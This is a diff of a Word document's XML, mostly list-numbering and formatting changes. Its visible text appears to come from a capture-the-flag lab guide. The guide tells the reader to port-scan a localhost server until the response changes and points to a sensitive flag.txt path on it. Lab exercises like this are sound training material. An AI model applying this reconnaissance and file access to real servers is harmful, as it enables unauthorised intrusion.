+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="13"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>http://localhost:8873</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ort</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">scan the server till </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>the response changes.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6F4B65" wp14:editId="08674FF3">
+                  <wp:extent cx="2366760" cy="371436"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="3" name="Picture 3"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId26"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
                             <a:ext cx="2483796" cy="389803"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
@@ -15006,7 +14214,6 @@
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -15045,10 +14252,7 @@
               <w:t>/</w:t>
             </w:r>
             <w:r>
-              <w:t>documents</w:t>
-            </w:r>
-            <w:r>
-              <w:t>/</w:t>
+              <w:t>documents/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15073,10 +14277,7 @@
               <w:t>/</w:t>
             </w:r>
             <w:r>
-              <w:t>random</w:t>
-            </w:r>
-            <w:r>
-              <w:t>/</w:t>
+              <w:t>random/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15113,9 +14314,6 @@
                 <w:numId w:val="14"/>
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>http://localhost:8873/documents/background-checks/sensitive/flag.txt</w:t>
@@ -15142,7 +14340,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -15168,7 +14365,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId27"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -15200,8 +14397,8 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId24"/>
-      <w:footerReference w:type="first" r:id="rId25"/>
+      <w:footerReference w:type="default" r:id="rId28"/>
+      <w:footerReference w:type="first" r:id="rId29"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -15677,99 +14874,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="419E1B94"/>
+    <w:nsid w:val="2C6B4DEF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="6F323C44"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+    <w:tmpl w:val="19E2432A"/>
+    <w:lvl w:ilvl="0" w:tplc="2A7E66AA">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="4294697F"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="6A3032BE"/>
-    <w:lvl w:ilvl="0" w:tplc="2280E944">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
+      <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:ind w:left="360" w:hanging="360"/>
@@ -15851,17 +14962,103 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="42DE0A1C"/>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="419E1B94"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="DAC2CA82"/>
-    <w:lvl w:ilvl="0" w:tplc="CC84724A">
+    <w:tmpl w:val="6F323C44"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
+      <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1080" w:hanging="360"/>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4294697F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6A3032BE"/>
+    <w:lvl w:ilvl="0" w:tplc="2280E944">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -15873,7 +15070,7 @@
       <w:lvlText w:val="%2)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1560" w:hanging="420"/>
+        <w:ind w:left="840" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
@@ -15882,7 +15079,7 @@
       <w:lvlText w:val="%3."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="1980" w:hanging="420"/>
+        <w:ind w:left="1260" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
@@ -15891,7 +15088,7 @@
       <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2400" w:hanging="420"/>
+        <w:ind w:left="1680" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
@@ -15900,7 +15097,7 @@
       <w:lvlText w:val="%5)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2820" w:hanging="420"/>
+        <w:ind w:left="2100" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
@@ -15909,7 +15106,7 @@
       <w:lvlText w:val="%6."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="3240" w:hanging="420"/>
+        <w:ind w:left="2520" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
@@ -15918,7 +15115,7 @@
       <w:lvlText w:val="%7."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3660" w:hanging="420"/>
+        <w:ind w:left="2940" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
@@ -15927,7 +15124,7 @@
       <w:lvlText w:val="%8)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="4080" w:hanging="420"/>
+        <w:ind w:left="3360" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
@@ -15936,451 +15133,21 @@
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="4500" w:hanging="420"/>
+        <w:ind w:left="3780" w:hanging="420"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="555A35FF"/>
+    <w:nsid w:val="42DE0A1C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="812846B0"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="64212354"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="321EF54A"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="6523477E"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="FA1E1858"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="65B93A87"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="25605A66"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="840" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="1260" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1680" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2100" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2520" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2940" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8)"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3360" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="3780" w:hanging="420"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="668D7AC4"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="0CC4FA40"/>
-    <w:lvl w:ilvl="0" w:tplc="04090019">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
